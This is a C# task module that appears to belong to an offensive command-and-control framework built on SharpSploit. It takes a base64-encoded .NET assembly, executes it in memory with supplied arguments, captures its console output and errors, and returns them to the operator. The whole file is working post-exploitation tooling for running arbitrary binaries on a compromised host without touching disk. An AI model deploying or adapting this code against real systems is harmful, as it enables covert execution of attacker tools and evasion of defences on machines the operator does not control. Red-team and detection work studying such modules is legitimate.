using System;
using System.IO;
using System.Linq;
using SharpSploit.Execution;

public static class Task
{
	public static string Execute(string AssemblyName, string EncodedAssembly, string Parameters = "")
	{
        string output = "";
        try
        {
            string[] args = Parameters.Split(' ').ToArray();
            
            TextWriter realStdOut = Console.Out;
            TextWriter realStdErr = Console.Error;
            TextWriter stdOutWriter = new StringWriter();
            TextWriter stdErrWriter = new StringWriter();
            Console.SetOut(stdOutWriter);
            Console.SetError(stdErrWriter);
            
            Assembly.AssemblyExecute(EncodedAssembly, new Object[] { args });
            
            Console.Out.Flush();
            Console.Error.Flush();
            Console.SetOut(realStdOut);
            Console.SetError(realStdErr);
            
            output = stdOutWriter.ToString();
            output += stdErrWriter.ToString();
        }
        catch (Exception e) { output += e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
        return output;
	}
}